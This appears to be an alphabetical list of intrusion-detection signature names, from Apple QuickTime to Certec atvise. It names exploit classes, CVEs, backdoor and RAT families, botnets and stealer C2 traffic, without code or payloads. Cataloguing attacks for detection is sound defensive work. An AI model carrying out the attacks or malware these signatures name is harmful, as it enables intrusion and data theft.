Apple-QuickTime-Pict-File-Processing-Memory-Corruption
Apple-QuickTime-Pict-Image-Paintpoly-Parsing-Heap-Buffer-Overflow
Apple-QuickTime-Player-Arbitrary-Code-Execution
Apple-QuickTime-Plugin-Content-Type-Buffer-Overflow
Apple-QuickTime-Plugin-Setlanguage-Buffer-Overflow
Apple-QuickTime-Psd-File-Parsing-CVE-2016-1769-Memory-Corruption
Apple-QuickTime-Qtplugin-ActiveX-Control-Marshaled-Pointer
Apple-QuickTime-QTPlugin.ocx-ActiveX-Vulnerable-Function-Call
Apple-QuickTime-QTVR-Qtvrstringatom-Parsing-Buffer-Overflow
Apple-QuickTime-Rnet-Box-Parsing-Heap-Buffer-Overflow
Apple-QuickTime-RTSP-Response-Crafted-Content-Type-Header-Buffer-Overflow
Apple-QuickTime-SMIL-File-Handling-Integer-Overflow
Apple-QuickTime-Streaming-Debug-Error-Logging-Buffer-Overflow
Apple-QuickTime-Stsc-Heap-Overflow
Apple-QuickTime-Stsd-Atoms-Handling-Heap-Overflow
Apple-QuickTime-Targa-File-Buffer-Overflow
Apple-QuickTime-Texml-Color-String-Parsing-Buffer-Overflow
Apple-QuickTime-Texml-Style-Element-Text-Specification-BOF
Apple-QuickTime-Texml-Textbox-Element-Memory-Corruption
Apple-QuickTime-Texml-Transform-Attribute-Parsing-Buffer-Overflow
Apple-QuickTime-Text-Track-Descriptors-Heap-Buffer-Overflow
Apple-QuickTime-Traf-Atom-Out-Of-Bounds-Access
Apple-QuickTime-Udta-Atom-Buffer-Overflow
Apple-QuickTime-Udta-Atom-Parsing-Heap-Overflow-Vulnerability
Apple-QuickTime-Vr-Tkhd-Heap-Corruption
Apple-Safari-Arbitrary-Code-Execution
Apple-Safari-CSS-Format-Argument-Handling-Memory-Corruption
Apple-Safari-CSS-Style-Overflow-DOS
Apple-Safari-Desktop-File-Download
Apple-Safari-Feed-URI-Denial-of-Service
Apple-Safari-For-Windows-Protocol-Handler-Command-Injection
Apple-Safari-For-Windows-URL-Spoofing
Apple-Safari-HTML-Image-Element-Handling-Use-After-Free
Apple-Safari-IDN-Punycode-Canadian-Syllabics-URL-Spoofing
Apple-Safari-Insecure-JavaScript-Usage
Apple-Safari-JS-Multibyte-Char-Escape
Apple-Safari-KwqListIteratorImpl-DoS
Apple-Safari-Objc-MsgSend-RTP-DoS
Apple-Safari-Parent.close-Code-Execution
Apple-Safari-Right-To-Left-Text-Rendering-Use-After-Free
Apple-Safari-Url-Handling-Cross-Origin-Security-Bypass
Apple-Safari-Webkit-Arbitrary-File-Creation
Apple-Safari-Webkit-Attribute-Child-Removal-Code-Execution
Apple-Safari-Webkit-Button-Column-Blocks-Memory-Corruption
Apple-Safari-Webkit-Button-First-Letter-Style-Rendering-Code-Execution
Apple-Safari-Webkit-CSS-Charset-Text-Transformation-Code-Execution
Apple-Safari-Webkit-CSS-Title-Memory-Corruption
Apple-Safari-Webkit-Floating-Point-Buffer-Overflow
Apple-Safari-Webkit-Floating-Point-Data-Type-Code-Execution
Apple-Safari-Webkit-Innerhtml-Double-Free-Memory-Corruption
Apple-Safari-Webkit-Menu-Onchange-Memory-Corruption
Apple-Safari-Webkit-Option-Element-Contenteditable-Code-Execution
Apple-Safari-Webkit-Range-Object-Remote-Code-Execution
Apple-Safari-Webkit-Rendering-Counter-Code-Execution
Apple-Safari-Webkit-Selections-Use-After-Free
Apple-Safari-Webkit-SVG-Markers-Use-After-Free-Memory-Corruption
Apple-Safari-Webkit-SVG-Memory-Corruption
Apple-Safari-Webkit-Use-After-Free-Code-Execution
Apple-Safari-Webkit-Webarchive-Injection
Apple-Safari-Webkit-XSS-Vulnerability-CVE-2017-7089
Apple-Safari-XML-Parser-Infinite-Recursion-DoS
Apple-Software-Update-Remote-Command-Execution
Apple-Webkit-Code-Execution-Vulnerability-CVE-2011-2813
Apple-Webkit-Cross-Site-Scripting-CVE-2021-1879
Apple-Webkit-Memory-Corruption-CVE-2016-4657
Apple-Webkit-Rowspan-DoS
Apple-Webkit-Ruby-Annotation-Memory-Corruption
Apple-XAR-Archive-Parsing-Arbitrary-File-Write-Vulnerability
Apple-XAR-Archive-Symlink-Parsing-Arbitrary-File-Write-Vulnerability
Apport-Remote-Code-Execution-Via-CrashDB-Field-CVE-2016-9949
AppRain-CMF-Arbitrary-PHP-File-Upload
Appsmith-RCE-CVE-2024-55964
APSystems-ECU-R-Command-Injection-CVE-2022-45699
Arcadyan-Firmware-Path-Traversal-CVE-2021-20090
Arcserve-Backup-Lgserver-Authentication-Password-Buffer-Overflow
ARCserve-D2D-Getnews-External-Entity-Injection
Arcserve-UDP-Authentication-Bypass-CVE-2023-26258
Arcserve-UDP-FileHandlingServlet-doUpload-Directory-Traversal
Arcserve-Unified-Data-Protection-Asnative.dll-Validate-Denial-Of-Service
Arcserve-Unified-Data-Protection-Directory-Traversal
Arcserve-Unified-Data-Protection-Getbackuppolicies-Information-Disclosure
Arcserve-Unified-Data-Protection-ImportNodeServlet-Dopost-Directory-Traversal
Arcserve-Unified-Data-Protection-Management-Service-Information-Disclosure
Arcserve-Unified-Data-Protection-Rpsservice4cpmimpl-Unrestricted-File-Upload
Ares-Peer-To-Peer-Network-Usage
Argosoft-FTP-Server-Dele-Command-BOF
ARJ-Archive-Long-Local-File-Header-7-Zip-BOF
Armageddon-Bot
ARMBot-Botnet
Arris-Motorola-Surfboard-SBG6580-Multiple-Vulnerabilites
Arris-TR3300-Command-Injection-CVE-2022-27002
Arris-VAP2500-Management-Portal-Command-Execution
ARS-VBS-Loader-C2-Traffic
Artica-Proxy-Cyrus.php-Command-Injection
Artica-Proxy-FW-Progress-Details-Directory-Traversal
Artica-Proxy-Fw.login.php-Apikey-SQL-Injection
Artica-Proxy-Images.listener.php-Arbitrary-File-Read
Artica-Proxy-Squid.conf-Authentication-Bypass
Artica-Proxy-Wiz.wizard.progress.php-Insecure-Deserialization
Artifex-Ghostscript-PostScript-Handling-S_xbcpe_process-Buffer-Overflow
Artifex-Ghostscript-PostScript-Sandbox-Bypass-CVE-2018-17961
ASePortal-Parameter-SQL-Injection
Ask-Toolbar-ActiveX-Control-ShortFormat-Property-Buffer-Overflow
Asn-1-Bitstring-Overflow-MS04-007
Asn-1-Integer-BOF-MS04-007
ASP.NET-Information-Disclosure-Vulnerability
Asterisk-AMI-Originate-Authenticated-RCE
Asterisk-Cdr_Object_Update_Party_B_Userfield_Cb-Buffer-Overflow
Asterisk-Management-Interface-HTTP-Digest-Authentication-Stack-Buffer-Overflow
Asterisk-pjsip-Endpoint-Presence-Disclosure
Asterisk-pjsip-Invalid-Fmtp-Media-Attribute-Denial-Of-Service
Asterisk-Res_pjsip_pubsub-Module-SIP-Subscribe-Type-Confusion-Denial-Of-Service
Asterisk-SIP-Channel-Driver-Remote-Denial-Of-Service
Asterisk-SIP-Invite-Malformed-SDP-Denial-of-Service
Asterisk-Skinny-Channel-Driver-Remote-Denial-of-Service-Vulnerability
Asterisk-Skinny-Channel-Get-Input-Integer-Overflow
Asterisk-TLS-HTTP-Content-Length-Denial-Of-Service
Astium-Remote-Code-Execution
Astonsoft-DeepBurner-Path-Attribute-Buffer-Overflow
Asus-Net4Switch-ActiveX-Buffer-Overflow
Asus-Net4Switch-Ipswcom.dll-ActiveX-Control-Stack-Buffer-Overflow
Asus-Remote-Console-DPC-Proxy-Server-Buffer-Overflow
Asus-RT-AC3200-Command-Injection
Asus-RT-N56U-Remote-Password-Disclosure
AsusWRT-Lan-Unauthenticated-Remote-Code-Execution
AsyncRAT-Infection-Traffic
Atftp-TFTP-Server-Error-Packet-DoS
AtHoc-IWSAlerts-ActiveX-Control-ControlFile-Buffer-Overflow
Atlassian-Bitbucket-Server-And-Data-Center-Command-Injection
Atlassian-Bitbucket-Server-And-Data-Center-CVE-2022-43781-Command-Injection
Atlassian-Companion-Remote-Code-Execution-CVE-2023-22524
Atlassian-Confluence-Data-Center-And-Server-addlanguage-RCE
Atlassian-Confluence-Server-Packageresourcemanager-Information-Disclosure
Atlassian-Confluence-Server-S-Endpoint-Information-Disclosure
Atlassian-Crowd-pdkinstall-CVE-2019-11580
Atlassian-Fisheye-And-Crucible-Mostactivecommitters-Information-Disclosure
Atlassian-JIRA-And-Service-Management-Ehcache-Rmi-Insecure-Deserialization
Atlassian-JIRA-Email-Templates-Server-Side-Template-Injection
Atlassian-JIRA-Issue-Collector-Directory-Traversal
Atlassian-JIRA-Server-And-Data-Center-Issue-Collector-Reflected-XSS
Atlassian-JIRA-Server-And-Data-Center-Limited-File-Read-CVE-2021-26086
Atlassian-JIRA-Server-And-Data-Center-Mobile-Plugin-Server-Side-Request-Forgery
Atlassian-JIRA-Server-And-Data-Center-Planurl-Reflected-Cross-Site-Scripting
Atlassian-JIRA-Server-And-Data-Center-Viewuserhover.jspa-Information-Disclosure
Atlassian-JIRA-Template-Injection-CVE-2019-11581
Atlassian-Remote-File-Access
Atmosphere-Framework-Reflected-Cross-Site-Scripting
Atrium-Software-Mercur-IMAPD-Subscribe-Command-Buffer-Overflow
ATT-WinVNC-Client-Buffer-Overflow
Attachmate-Reflection-FTP-Client-ActiveX-Getglobalsettings-Memory-Corruption
Attachmate-Reflection-FTP-Client-Pwd-Command-Buffer-Overflow
ATutor-Directory-Traversal-RCE
ATutor-SQL-Injection
Aurigma-Image-Uploader-ActiveX-Control-Denial-Of-Service
Aurigma-Image-Uploader-Buffer-Overflow
Authentium_Command_AntiVirus_odapi.dll_Multiple_Buffer_Overflows
Autodesk-Autocad-Insecure-FAS-Loading
Autodesk-Autocad-Insecure-Library-Loading
Autodesk-IDrop-ActiveX-Control-ControlFile-Buffer-Overflow
Autodesk-Liveupdate-ActiveX-Control-Code-Execution
AutoIt-Compiled-Program-Traffic
Automated-Solutions-Modbus_DoS
Automattic-Woocommerce-Blocks-Wordpress-Plugin-Store-API-SQL-Injection
Autonomy-Connected-Backup-Type-13-Command-Injection
Autonomy-Keyview-Excel-File-Sst-Parsing-Integer-Overflow
Avast!-AntiVirus-ACE-File-Handling-Buffer-Overflow
Avast-AntiVirus-Engine-Remote-Lha-Buffer-Overflow
Avast-AntiVirus-X.509-Certificate-Common-Name-Remote-Command-Execution
Avaya-IP-Office-Customer-Call-Reporter-Unrestricted-File-Upload
Avaya-Winpdm-Unite-Host-Router-Service-Stack-Buffer-Overflow
AveMaria-Stealer-C2-Traffic
AVI-DirectX-DirectShow-AVI-Strn-BOF
Aviatrix-Controller-Command-Injection-CVE-2024-50603
Aviatrix-Controller-File-Upload-CVE-2021-40870
Avid-Media-Composer-Stack-Based-Buffer-Overflow
Avideo-WWBNIndex-Plugin-Unauthenticated-RCE
Aviosys-IP-POWER-9258-W2-Information-Disclosure
Avira-Management-Console-Server-HTTP-Header-Processing-Heap-Buffer-Overflow
Avtech-IP-Camera-AVM1203-Command-Injection-CVE-2024-7029
Avtech-IP-Camera-Cgi-Bin-Nobody-Access
Avtech-IP-Camera-Multiple-Command-Injection-Vulnerabilities
AwindInc-SNMP-Service-Command-Injection
AwingSoft-Winds3D-Player-Command-Execution
AwingSoft-Winds3D-Player-SceneURL-Buffer-Overflow
Awstats-Migrate-Remote-Command-Execution
Awstats-Totals-Remote-Code-Execution
Axigen-Free-Mail-Server-Directory-Traversal
Axis-Camera-Control-ActiveX-Control-SetBMP-Buffer-Overflow
Axis-Communications-Camera-Control-Image-Pan-Tilt-Buffer-Overflow
Axis-IP-Camera-Application-Upload
Axis-Media-Control-Unsafe-ActiveX-Method
Axis-Network-Camera-Remote-Code-Execution
axTLS-UTC-Time-Parse-Error
Azeotech-DAQFactory-NETB-Buffer-Overflow
AZORult-Stealer-C2-Traffic
B-Labs-Bopup-Communication-Server-Stack-Based-Buffer-Overflow
Backdoor-Agobot
Backdoor-Alvgus
Backdoor-Amanda
Backdoor-AOL-Admin
Backdoor-Asylum
Backdoor-Backage
Backdoor-BackConstruction
Backdoor-BackDoor
Backdoor-BackOrifice2000
Backdoor-Balsitix
Backdoor-Basic-Hell
Backdoor-BDDT
Backdoor-Bigorna
Backdoor-BioNet
Backdoor-BLA
Backdoor-Black-Angel
Backdoor-Blade-Runner
Backdoor-Blazer5
Backdoor-Blood-Fest-Evolution
Backdoor-Breach
Backdoor-Bugs
Backdoor-Buschtrommel
Backdoor-ButtMan
Backdoor-CAFEiNi
Backdoor-Celine
Backdoor-Cero
Backdoor-Connection
Backdoor-Crack-Down
Backdoor-CrazzyNet
Backdoor-Danton
Backdoor-Dark-Connection-Inside
Backdoor-Deep-Throat
Backdoor-DFch-Grisch
Backdoor-Digital-Rootbeer
Backdoor-Doly
Backdoor-Donald-Dick
Backdoor-Drat
Backdoor-DTr
Backdoor-Duddie
Backdoor-ENM-Malware
Backdoor-Executor
Backdoor-Exploiter
Backdoor-F-Backdoor
Backdoor-Forced-Entry
Backdoor-Fore
Backdoor-Frenzy
Backdoor-Frenzy-2000
Backdoor-GateCrasher
Backdoor-Ghost
Backdoor-Gift-Latinus-Pest
Backdoor-GirlFriend
Backdoor-Glacier
Backdoor-Gspot
Backdoor-Hack-A-Tack
Backdoor-Hellz-Addiction
Backdoor-Host-Control
Backdoor-InCommand
Backdoor-Infector
Backdoor-Insane-Network
Backdoor-Intruzzo
Backdoor-Kid-Terror
Backdoor-Kuang2-Virus
Backdoor-Last2000
Backdoor-Leszcz
Backdoor-Lithium
Backdoor-M2-Trojan
Backdoor-Mantis
Backdoor-Massaker
Backdoor-Masters-Of-Paradise
Backdoor-Mavericks-Matrix
Backdoor-Meet-The-Lamer
Backdoor-Michal
Backdoor-Microspy
Backdoor-Millenium
Backdoor-Mini-Oblivion
Backdoor-Mneah
Backdoor-Moonpie
Backdoor-Mosucker
Backdoor-Net-Administrator
Backdoor-Net-Devil
Backdoor-Net-Metropolitan
Backdoor-Net-Taxi
Backdoor-NetBus
Backdoor-NetBus-Pro
Backdoor-Netcontroller
Backdoor-Netraider
Backdoor-NetSphere
Backdoor-NetSpy
Backdoor-Network-Terrorist
Backdoor-New-Silencer
Backdoor-Nirvana
Backdoor-NokNok
Backdoor-NoSecure
Backdoor-Oblivion
Backdoor-Olive
Backdoor-One
Backdoor-OOTLT
Backdoor-Optix-Pro
Backdoor-Oxon
Backdoor-PC-Invader
Backdoor-Phase-Zero
Backdoor-Phoenix
Backdoor-PitFall
Backdoor-Pitfall-Surprise
Backdoor-Poison-Ivy
Backdoor-Priority
Backdoor-Private-Port
Backdoor-Progenic
Backdoor-Project-Next
Backdoor-Prosiak
Backdoor-PsychWard
Backdoor-Qwertos-RAT
Backdoor-R0Xr4t
Backdoor-R3CServer
Backdoor-RaTHeaD
Backdoor-Remote-Boot-Tool
Backdoor-Remote-Hack
Backdoor-Remote-Process-Monitor
Backdoor-Remote-Revise
Backdoor-Revenger
Backdoor-Ripperz-Controller
Backdoor-Ruler
Backdoor-Satans
Backdoor-Scarab
Backdoor-Schneckenkorn
Backdoor-Script-Serv-U-FTP-User-CVE-2021-35211
Backdoor-Tcc-Trojan
Backdoor-The-Prayer
Backdoor-The-Thing
Backdoor-The-Unexplained
Backdoor-Total-Solar-Eclypse
Backdoor-TransScout
Backdoor-Trojan-Cow
Backdoor-Tron
Backdoor-Truva
Backdoor-Ullysse
Backdoor-UltimateRAT
Backdoor-Ultors
Backdoor-Undetected
Backdoor-Vagr-Nocker
Backdoor-ValV-N.E.T
Backdoor-Vampire
Backdoor-Voodoo-Doll
Backdoor-War-Trojan
Backdoor-Win-Mite-1
Backdoor-WinCrash-1-03
Backdoor-WinCrash-2-0
Backdoor-WinRAT-1
Backdoor-WinRAT-1-2
Backdoor-Wow23-03
Backdoor-Xanadu-1-0
Backdoor-Xanadu-1-11
Backdoor-XLog-2-2
Backdoor-Y3K-RAT-1-1
Backdoor-Y3K-RAT-1-4
Backdoor-Y3K-RAT-1-6
Backdoor-YAT-2-1
Backdoor-YAT-3-01
BACnet-OPC-Client-ActiveX-Control-Buffer-Overflow
Badbox-Botnet-C2-Traffic
Bagle-Spambot
Baidu-Soba-Search-Bar-File-Download-And-Execute
BakBone-NetVault-Heap-BOF
BakBone-NetVault-Heap-BOF-2
Baldr-Botnet-Panel-Shell-Upload-Exploit
Bankpatch-Trojan-Request
BaoFeng-Storm-ActiveX-Control-Multiple-Methods-Buffer-Overflow
Barco-WePresent-File_transfer.cgi-Command-Injection
Bargain-Buddy
Barracuda-ESG-Archive-Name-Validation-Vulnerability-CVE-2023-2868
Barracuda-ESG-Parameter-Injection-CVE-2023-7102
Bash-Shellshock-Code-Injection
Basic-Analysis-And-Security-Engine-File-Include
Bazar-Loader-Backdoor-Malware-Infection-Traffic
Bbcode-e107-Remote-Code-Execution-Vulnerability
BBShop-Remote-File-Inclusion
Bea-WebLogic-SSL-Handling-Denial-Of-Service
Beacon-Remote-File-Inclusion
Beck-Gmbh-IPC@CHIP-Conf-File-Discosure
Beck-Gmbh-IPC@CHIP-Denial-of-Service
Beck-Gmdg-IPC@CHIP-Configuration-File-Disclosure
Beck-Ipc-Chip-HTTP-Denial-Of-Service
Beckhoff-Twincat-DoS
Belkin-N750-MiniHttpd-Buffer-Overflow
Belkin-Wemo-UPnP-RCE-CVE-2018-6692
Belkin-Wemo-UPnP-Remote-Code-Execution
Bennet-Tec-TList-ActiveX-SaveData-Arbitrary-File-Creation
BentoML-RCE-CVE-2025-27520
BentoML-Runner-Server-RCE-CVE-2025-32375
Berlios-GPSD-Format-String-Vulnerability
Beyondtrust-Command-Injection-CVE-2024-12356
Beyondtrust-Remote-Support-Cross-Site-Scripting-CVE-2021-31589
Big-Brother-Cgi-Vulnerability
BigAnt-Buffer-Overflow
BigAnt-IM-Server-2.2-Buffer-Overflow
BigAnt-Server-Ddnf-Request-Stack-Buffer-Overflow
BigAnt-Server-Dupf-Command-Arbitrary-File-Upload
BigAnt-Server-SCH-Request-Stack-Buffer-Overflow
BillQuick-Web-Suite-SQL-Injection-CVE-2021-42258
Binary_RealPlayer-RealMedia-Security-Bypass
BIND-Inverse-Infoleak
BIND-Inverse-Query-BO
BIND-NXT-BO
BIND-Opt-Subdomain-Denial-Of-Service
BIND-Tsig-BO
BIND-Version-Query
BisonFTP-Server-Directory-Traversal
Bisonware-FTP-Server-Buffer-Overflow
Bitcoin-Bot
Bitcoin-Miner-Getwork-JSON-Request
BitDefender-AntiVirus-PDF-Processing-Memory-Corruption
BitDefender-Internet-Security-Filename-Cross-Script-Script-Code-Execution
BitDefender-Online-Scanner-ActiveX-Control-Buffer-Overflow
BitTorrent-Over-Port-80
BitTorrent-Peer-To-Peer-Network-Usage
Bitweaver-Overlay_Type-Directory-Traversal
Black-Ice-BIDIB.ocx-ActiveX-Arbitrary-File-Download
Blackenergy-Bot
Blackmatter-Ransomware-Remote-Encryption-Attempt
Blazefind
BlazeVideo-BlazeDVD-Pro-PLF-File-Processing-Buffer-Overflow
Blizzard-World-Of-Warcraft-Usage
Blogspot-Malicious-Script-HTML
Bludit-CMS-Upload-Images.php-Arbitrary-File-Upload
Bludit-Directory-Traversal-Image-File-Upload
Blue-Coat-Authentication-Proxy-Buffer-Overflow
Blue-Coat-BCAAA-Stack-Buffer-Overflow
Blue-Coat-WinProxy-Host-Header-Buffer-Overflow
Blueimp-jQuery-Arbitrary-File-Upload
Bmc-BladeLogic-Server-Automation-RSCD-Agent-RCE
Bmc-Patrol-Agent-Command-Execution
Bmc-Track-It-Arbitrary-File-Upload
Bmc-TrackIt-Password-Reset
BMP-Windows-Media-Player-BMP-Header-Dataoffset-Buffer-Overflow
Boa-Web-Server-Arbitrary-File-Read-CVE-2017-9833
Bobax
BoidCMS-Command-Injection
BolinTech-Dream-FTP-Server-Format-String
Bolt-CMS-Authenticated-Remote-Code-Execution
Bomberclone-Buffer-Overflow
Bookedspace
BOOTP-Daemon-Long-Filename-BOF
BOOTP-Sun-Solaris-in.dhcpd-Malformed-Packet
Borland-Accurev-Savecontentserviceimpl-Servlet-Directory-Traversal
Borland-Interbase-Database-Message-Handling-Buffer-Overflow
Borland-Interbase-Database-Service-Malformed-Request-Buffer-Overflow
Borland-Interbase-Integer-Overflow-Vulnerability
Borland-Interbase-Multiple-Remote-Buffer-Overflows
Borland-Interbase-Open-Marker-File-Buffer-Overflow
Borland-Software-Interbase-ibserver.exe-Service-Attach-Request-BOF
Borland-Starteam-Multicast-Service-HTTP-Handling-Buffer-Overflow
Bot:-Dirtjumper-Traffic-Detected
Botnet-Command-And-Control
Botnet-Fareit
Botnet-Fynloski
Botnet-Ghost
Botnet-Kuluoz
Botnet-Nitol
Botnet-njRAT
Botnet-Palevo
Botnet-PoisonIvy
Botnet-Pramro
Botnet-Pushdo
Botnet-Ramnit
Botnet-Sality_NonP2P
Botnet-Sality_P2P
Botnet-Smokeloader
Botnet-Teslacrypt
Botnet-Tofsee
Botnet-Virut
Botnet-Vobfus
Botnet-Win32-Backdoor-Zmcwinsvc-DNS-Query
Botnet-Yoddos
Botnet-ZeroAccess
Botnet-Zeus_P2P
Bredolab-Bot
BrightStor-Arcserve-Backup-Agent-For-MSSQL-BOF
BrightStor-Arcserve-Enterprise-Backup-Discovery-Service-Servicepc-BOF
BrightStor-Arcserve-Enterprise-Backup-UDP-BOF
Broadcastpc
Broadwin-WebAccess-Client-Bwocxrun-ActiveX-Memory-Corruption
Broadwin-WebAccess-Client-Bwocxrun-ActiveX-Ocxspool-Format-String
Broadwin-WebAccess-Denial-Of-Service
Brocade-Network-Advisor-Climonitorreportservlet-Filename-Directory-Traversal
Brocade-Network-Advisor-Dashboardfilereceiveservlet-Filename-Directory-Traversal
Brocade-Network-Advisor-Filereceiveservlet-Filename-Directory-Traversal
Brocade-Network-Advisor-Softwareimageupload-Name-Filename-Directory-Traversal
BSD-Ftpd-Off-By-One-BOF
Buer-Loader-C2-Traffic
Bugbear-Worm
Business-Objects-Crystal-Reports-Rpt-File-Handling
Busybox-Project-Busybox-Udhcp-Option-Out-Of-Bounds-Read
BYOB-Arbitrary-File-Write-And-Command-Injection
BZip2-Compressed-File
CA-Arcserve-Backup-Authentication-Service-Invalid-Virtual-Function-Call
CA-Arcserve-Backup-For-Laptops-And-Desktops-Lgserver-Buffer-Overflow
CA-ARCserve-Backup-For-Laptops-And-Desktops-Lgserver-Handshake-Buffer-Overflow
CA-Arcserve-Backup-For-Laptops-And-Desktops-Lgserver-Multiple-Buffer-Overflows
CA-Arcserve-Backup-For-Laptops-And-Desktops-Lgserver-Service-Code-Execution
CA-Arcserve-Backup-Lgserver-Handshake-Buffer-Overflow
CA-ARCserve-Backup-Message-Engine-RPC-Opcode-59-Denial-Of-Service
CA-Arcserve-Backup-NetBackup-Arbitrary-File-Upload
CA-ARCserve-D2D-Axis2-Default-Credentials
CA-ARCserve-D2D-Credential-Disclosure
CA-Arcserve-D2D-GWT-RPC-Request-Credentials-Disclosure
CA-BrightStor-Arcserve-Backup-Caloggerd-Opcode-79-Stack-Buffer-Overflow
CA-BrightStor-Arcserve-Backup-Discovery-Service-Hostname-Buffer-Overflow
CA-BrightStor-Arcserve-Backup-Lgserver-Arbitrary-File-Upload
CA-BrightStor-Arcserve-Backup-Lgserver-Buffer-Overflow
CA-BrightStor-Arcserve-Backup-Lgserver-Stack-Buffer-Overflow
CA-BrightStor-Arcserve-Backup-Media-Server-SunRPC-Code-Execution-Vulnerability
CA-BrightStor-Arcserve-Backup-Message-Engine-Buffer-Overflow
CA-BrightStor-Arcserve-Backup-Message-Engine-Denial-Of-Service
CA-BrightStor-Arcserve-Backup-Message-Engine-Insecure-Method-Exposure
CA-BrightStor-Arcserve-Backup-Message-Engine-Opcode-117-BOF
CA-BrightStor-Arcserve-Backup-Portmapper-TADDR2UADDR-DOS
CA-BrightStor-Arcserve-Backup-Tape-Engine-RPC-Call-Memory-Corruption
CA-BrightStor-Arcserve-Backup-Tape-Engine-RPC-GetGroupStatus-BOF
CA-BrightStor-Arcserve-Backup-Tape-Engine-RPC-ReserveGroup-BOF
CA-BrightStor-Arcserve-Backup-Universal-Agent-Buffer-Overflow
CA-BrightStor-Arcserve-Backup-Xdr-Parsing-Buffer-Overflow
CA-BrightStor-Arcserve-Lgserver-Authentication-Username-Overflow
CA-BrightStor-Backup-Agent-RPC-Server-Connection-Id-Pointer-Buffer-Overflow
CA-BrightStor-HSM-Buffer-Overflow
CA-Erwin-Web-Portal-Configserviceprovider-Information-Disclosure
CA-Erwin-Web-Portal-Configserviceprovider-Remote-File-Creation
CA-Erwin-Web-Portal-Fileaccessserviceprovider-Denial-Of-Service
CA-Erwin-Web-Portal-Profileiconservlet-Information-Disclosure
CA-eTrust-Intrusion-Detection-Encryption-Key-Handling-Denial-Of-Service
CA-eTrust-PestPatrol-ActiveX-Control-Buffer-Overflow
CA-eTrust-Secure-Content-Manager-Gateway-FTP-Pasv-Stack-Overflow
CA-Internet-Security-Suite-Xmlsecdb-ActiveX-Insecure-File-Creation
CA-License-Client-PUTOLF-Request-Directory-Traversal
CA-License-Client-Server-Getconfig-BOF
CA-License-Software-GCR-Buffer-Overflow
CA-License-Software-Invalid-Command-Buffer-Overflow
CA-License-Software-PUTOLF-Buffer-Overflow
CA-Multiple-Products-Console-Server-Login-Credentials-Handling-BOF
CA-Products-Discovery-Service-Buffer-Overflow
CA-Products-Message-Queuing-Server-Buffer-Overflow
CA-Total-Defense-Suite-UNCWS-Exportreport-SQL-Injection
CA-Total-Defense-Suite-UNCWS-UnassignFunctionalRoles-SQL-Injection
CA-Unified-Infrastructure-Management-Download_lar.Jsp-Directory-Traversal
CA-Unified-Infrastructure-Management-Nimcontroller-Buffer-Overflow
CA-XOsoft-Products-Xosoapapi-Buffer-Overflow
Cabinet-Archive-File-Transfer
CachetHQ-Cachet-Createincidentcommandhandler-Template-Injection
Cacti-Color-Filter-SQLi-To-RCE
Cacti-Group-Cacti-Automation-Graph-And-Tree-Rules-Name-Stored-XSS
Cacti-Group-Cacti-Build_Graph_Object_SQL_Having-SQL-Injection
Cacti-Group-Cacti-Color.php-SQL-Injection
Cacti-Group-Cacti-Graphs.php-SQL-Injection
Cacti-Group-Cacti-Graph_view.php-SQL-Injection
Cacti-Group-Cacti-Installer-Setpaths-Log-Path-Arbitrary-File-Write
Cacti-Group-Cacti-Managers-SQL-Injection
Cacti-Group-Cacti-Package_import.php-Arbitrary-File-Write
Cacti-Group-Cacti-poller_automation.php-Command-Injection
Cacti-Group-Cacti-Remote_Agent-Command-Injection
Cacti-Group-Cacti-Rrdtool-Crlf-Injection
Cacti-Group-Cacti-SNMP_Escape_String-Command-Injection
Cacti-Group-Cacti-SQL_Save-SQL-Injection
Cacti-Group-poller_Host_Duplicate-SQL-Injection
Cacti-Host_Templates-Template-SQL-Injection-CVE-2024-54146
Cacti-Links.php-Console-Section-Name-Stored-Cross-Site-Scripting
Cacti-Links.php-Fileurl-Stored-Cross-Site-Scripting
Cacti-Links.php-Title-Stored-Cross-Site-Scripting
Cacti-poller_Standard-Error-Log-Path-Arbitrary-File-Read-CVE-2024-45598
Cacti-Spikekill-Cross-Site-Scripting
Cain-And-Abel-RDP-Buffer-Overflow
CakePHP-PHP-Injection-Unserialize-Attack
Calendar-Pl-Remote-Command
Calibre-Python-Code-Injection-CVE-2024-6782
Cambium-ePMP-1000-Ping-Command-Injection
Campcodes-Thesis-Archiving-System-SQL-Injection-CVE-2023-2149
Campo-Downloader-Malware-Infection-Traffic
Camtron-CMNC-200-Buffer-Overflow-CVE-2010-4230
Canon-Printer-Denial-Of-Service
Canonical-Ksmbd-Tools-Ksmbd.Mountd-SMB_Read_Sid-Heap-Buffer-Overflow
Carberp-Botnet
Carberp-Web-Panel-Remote-Code-Execution
Carel-PlantVisor-Directory-Traversal
Carel-PlantVisor-Pro-Hardcoded-Credentials-Vulnerability
Carel-PlantVisor-Pro-Local-File-Inclusion-Vulnerability
Carlo-Gavazzi-PowerSoft-Directory-Traversal
Castle-Rock-Computing-SNMPc-Cross-Site-Scripting-CVE-2016-5642
Cayin-CMS-NTP-Server-RCE
Cayin-xPost-wayfinder_seqid-SQLi
CCSO-Mercury-Mail-Transport-System-Long-Command-BOF
CCTV-DVR-Remote-Code-Execution
CentOS-Web-Panel-7-Remote-Code-Execution-CVE-2022-44877
CentOS-Web-Panel-Command-Injection-CVE-2018-18322
Centreon-centreonAuth-Command-Injection
Centreon-CSV_hostgrouplogs-SQL-Injection
Centreon-formMibs-Command-Injection
Centreon-Generateimage-Index-SQL-Injection
Centreon-Graph-Split-Chartid-SQL-Injection
Centreon-Hostgroupdependency-dep_Id-SQL-Injection
Centreon-Knowledgebase-Proxy-Proceduresproxy-SQL-Injection
Centreon-Metaservice-Meta_Id-SQL-Injection
Centreon-Nagios-Path-Command-Injection
Centreon-poller-Remote-Command-Execution
Centreon-RRDdatabase_Status_Path-Command-Injection
Centreon-Serverconnectionconfigurationservice.php-Command-Injection
Centreon-SQL-And-Command-Injection
Centreon-Web-Centreongraph-Initcurvelist-SQL-Injection
Centreon-Web-Formcontactgroup-SQL-Injection
Centreon-Web-Insertgraphtemplate-SQL-Injection
Centreon-Web-Managevmetric-SQL-Injection
Centreon-Web-poller-Broker-Disablcentreonbrokerindb-SQL-Injection
Centreon-Web-poller-Broker-Enablecentreonbrokerindb-SQL-Injection
Centreon-Web-poller-Broker-Insertconfig-SQL-Injection
Centreon-Web-poller-Resource-SQL-Injection
Centreon-Web-Updatecontactservicecommands-SQL-Injection
Centreon-Web-Updatedirectory-SQL-Injection
Centreon-Web-Updatelcarelation-SQL-Injection
Centreon-Web-Updateservicehost-SQL-Injection
Centreon-Web-Updateservicehost_MC-SQL-Injection
Certec-atvise-atserver-Denial-of-Service
Certec-atvise-webMI2ADS-Denial-Of-Service
Certec-atvise-webMI2ADS-Denial-of-Service-2
